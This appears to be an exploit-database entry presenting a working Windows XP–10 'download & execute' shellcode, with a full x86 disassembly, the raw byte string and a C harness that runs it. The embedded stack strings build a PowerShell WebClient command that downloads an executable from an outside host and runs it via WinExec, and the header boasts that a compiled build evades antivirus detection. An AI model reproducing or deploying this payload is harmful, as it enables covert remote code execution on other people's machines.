Windows XP - 10 - Download & Execute Shellcode



EKU-ID: 5633 CVE: OSVDB-ID:
Author: B3mB4m Published: 2016-06-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
[+] Author  : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/shellsploit-framework
[~] Greetz  : Bomberman,T-Rex,Pixi
-----------------------------------------------------------
 
Tested on :
    Windows XP/SP3 x86
    Windows 7 Ultimate x64 
    Windows 8.1 Pro Build 9600 x64
    Windows 10 Home x64
 
 
* This source belongs to shellsploit project under MIT licence.
 
* If you convert it an executable file, its will be FUD(without any encrypt).
    -PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt
 
 
 
    0x0:    31c9            xor ecx, ecx
    0x2:    b957696e45      mov ecx, 0x456e6957
    0x7:    eb04            jmp 0xd
    0x9:    31c9            xor ecx, ecx
    0xb:    eb00            jmp 0xd
    0xd:    31c0            xor eax, eax
    0xf:    31db            xor ebx, ebx
    0x11:   31d2            xor edx, edx
    0x13:   31ff            xor edi, edi
    0x15:   31f6            xor esi, esi
    0x17:   648b7b30        mov edi, dword ptr fs:[ebx + 0x30]
    0x1b:   8b7f0c          mov edi, dword ptr [edi + 0xc]
    0x1e:   8b7f1c          mov edi, dword ptr [edi + 0x1c]
    0x21:   8b4708          mov eax, dword ptr [edi + 8]
    0x24:   8b7720          mov esi, dword ptr [edi + 0x20]
    0x27:   8b3f            mov edi, dword ptr [edi]
    0x29:   807e0c33        cmp byte ptr [esi + 0xc], 0x33
    0x2d:   75f2            jne 0x21
    0x2f:   89c7            mov edi, eax
    0x31:   03783c          add edi, dword ptr [eax + 0x3c]
    0x34:   8b5778          mov edx, dword ptr [edi + 0x78]
    0x37:   01c2            add edx, eax
    0x39:   8b7a20          mov edi, dword ptr [edx + 0x20]
    0x3c:   01c7            add edi, eax
    0x3e:   89dd            mov ebp, ebx
    0x40:   81f957696e45    cmp ecx, 0x456e6957
    0x46:   0f8530010000    jne 0x17c
    0x4c:   8b34af          mov esi, dword ptr [edi + ebp*4]
    0x4f:   01c6            add esi, eax
    0x51:   45              inc ebp
    0x52:   390e            cmp dword ptr [esi], ecx
    0x54:   75f6            jne 0x4c
    0x56:   8b7a24          mov edi, dword ptr [edx + 0x24]
    0x59:   01c7            add edi, eax
    0x5b:   668b2c6f        mov bp, word ptr [edi + ebp*2]
    0x5f:   8b7a1c          mov edi, dword ptr [edx + 0x1c]
    0x62:   01c7            add edi, eax
    0x64:   8b7caffc        mov edi, dword ptr [edi + ebp*4 - 4]
    0x68:   01c7            add edi, eax
    0x6a:   89d9            mov ecx, ebx
    0x6c:   b1ff            mov cl, 0xff
    0x6e:   53              push ebx
    0x6f:   e2fd            loop 0x6e
    0x71:   68293b7d22      push 0x227d3b29
    0x76:   6865786527      push 0x27657865
    0x7b:   687474792e      push 0x2e797474
    0x80:   6828277075      push 0x75702728
    0x85:   6863757465      push 0x65747563
    0x8a:   686c457865      push 0x6578456c
    0x8f:   685368656c      push 0x6c656853
    0x94:   686f6e292e      push 0x2e296e6f
    0x99:   6863617469      push 0x69746163
    0x9e:   6870706c69      push 0x696c7070
    0xa3:   686c6c2e41      push 0x412e6c6c
    0xa8:   6820536865      push 0x65685320
    0xad:   682d636f6d      push 0x6d6f632d
    0xb2:   6865637420      push 0x20746365
    0xb7:   682d4f626a      push 0x6a624f2d
    0xbc:   68284e6577      push 0x77654e28
    0xc1:   682729203b      push 0x3b202927
    0xc6:   682e657865      push 0x6578652e
    0xcb:   6875747479      push 0x79747475
    0xd0:   682c202770      push 0x7027202c
    0xd5:   6865786527      push 0x27657865
    0xda:   687474792e      push 0x2e797474
    0xdf:   68362f7075      push 0x75702f36
    0xe4:   68742f7838      push 0x38782f74
    0xe9:   6861746573      push 0x73657461
    0xee:   6874792f6c      push 0x6c2f7974
    0xf3:   682f707574      push 0x7475702f
    0xf8:   687468616d      push 0x6d616874
    0xfd:   6873677461      push 0x61746773
    0x102:  686c692f7e      push 0x7e2f696c
    0x107:  687274682e      push 0x2e687472
    0x10c:  68652e6561      push 0x61652e65
    0x111:  682f2f7468      push 0x68742f2f
    0x116:  687470733a      push 0x3a737074
    0x11b:  6828276874      push 0x74682728
    0x120:  6846696c65      push 0x656c6946
    0x125:  686c6f6164      push 0x64616f6c
    0x12a:  68446f776e      push 0x6e776f44
    0x12f:  686e74292e      push 0x2e29746e
    0x134:  68436c6965      push 0x65696c43
    0x139:  682e576562      push 0x6265572e
    0x13e:  68204e6574      push 0x74654e20
    0x143:  686a656374      push 0x7463656a
    0x148:  68772d4f62      push 0x624f2d77
    0x14d:  6820284e65      push 0x654e2820
    0x152:  682226207b      push 0x7b202622
    0x157:  68616e6420      push 0x20646e61
    0x15c:  68636f6d6d      push 0x6d6d6f63
    0x161:  686c6c202d      push 0x2d206c6c
    0x166:  6872736865      push 0x65687372
    0x16b:  68706f7765      push 0x65776f70
    0x170:  89e2            mov edx, esp
    0x172:  41              inc ecx
    0x173:  51              push ecx
    0x174:  52              push edx
    0x175:  ffd7            call edi
    0x177:  e88dfeffff      call 9
    0x17c:  8b34af          mov esi, dword ptr [edi + ebp*4]
    0x17f:  01c6            add esi, eax
    0x181:  45              inc ebp
    0x182:  813e45786974    cmp dword ptr [esi], 0x74697845
    0x188:  75f2            jne 0x17c
    0x18a:  817e0450726f63  cmp dword ptr [esi + 4], 0x636f7250
    0x191:  75e9            jne 0x17c
    0x193:  8b7a24          mov edi, dword ptr [edx + 0x24]
    0x196:  01c7            add edi, eax
    0x198:  668b2c6f        mov bp, word ptr [edi + ebp*2]
    0x19c:  8b7a1c          mov edi, dword ptr [edx + 0x1c]
    0x19f:  01c7            add edi, eax
    0x1a1:  8b7caffc        mov edi, dword ptr [edi + ebp*4 - 4]
    0x1a5:  01c7            add edi, eax
    0x1a7:  31c9            xor ecx, ecx
    0x1a9:  51              push ecx
    0x1aa:  ffd7            call edi
*/
 
#include<stdio.h>
  
char shellcode[]=\
  
"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7";
  
main(){(* (int(*)()) shellcode)();}